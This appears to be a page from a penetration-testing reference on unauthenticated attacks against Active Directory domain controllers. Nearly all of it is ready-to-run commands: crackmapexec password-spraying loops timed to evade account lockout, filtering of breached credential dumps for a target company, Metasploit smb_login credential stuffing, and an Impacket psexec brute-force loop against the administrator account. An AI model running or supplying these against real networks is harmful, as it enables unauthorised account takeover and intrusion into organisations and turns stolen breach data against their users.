Non-Authenticated (External) Attacks
Password Spraying
Requirements: User list, common passwords, understanding of domain lockout policy
Password Spraying Execution
# SMB password spraying with delay
crackmapexec smb <DC-IP> -u users.txt -p 'Password123!' --continue-on-success
# Multiple password attempts with lockout consideration
for password in "Password123!" "Welcome2024!" "Company123!"; do
crackmapexec smb <DC-IP> -u users.txt -p "$password" --continue-on-success
sleep 1800 # 30-minute delay between password attempts
doneCredential Stuffing
Requirements: Breach credential data matching target organization, network access to domain services
Credential Preparation
# Process breach data for domain-specific attempts
grep "@<company>.com" breached_creds.txt | cut -d: -f1,2 > domain_creds.txtCredential Stuffing Execution
CrackMapExec Method
# Test credential pairs without brute force permutation
crackmapexec smb <DC-IP> -u usernames.txt -p passwords.txt --no-bruteforce --continue-on-successMetasploit Method
# Credential validation module
use auxiliary/scanner/smb/smb_login
set RHOSTS <DC-IP>
set USERPASS_FILE /path/to/domain_creds.txt
set STOP_ON_SUCCESS false
runBrute Force Attacks
Requirements: Target administrative accounts, comprehensive password lists, understanding of lockout policies
Targeted Brute Force
CrackMapExec Method
# Single account brute force with lockout avoidance
crackmapexec smb <DC-IP> -u 'administrator' -p passwords.txt --continue-on-success
# Time-delayed brute force for lockout evasion
for password in $(head -4 passwords.txt); do # Test only 4 passwords per cycle
crackmapexec smb <DC-IP> -u 'administrator' -p "$password"
sleep 5
done
sleep 1800 # Wait 30 minutes before next cycleImpacket Method
# Protocol-specific brute force
for password in $(cat admin_passwords.txt); do
python3 psexec.py <domain>/administrator:"$password"@<DC-IP> 2>/dev/null
if [ $? -eq 0 ]; then echo "SUCCESS: administrator:$password"; break; fi
sleep 60
doneLast updated
Was this helpful?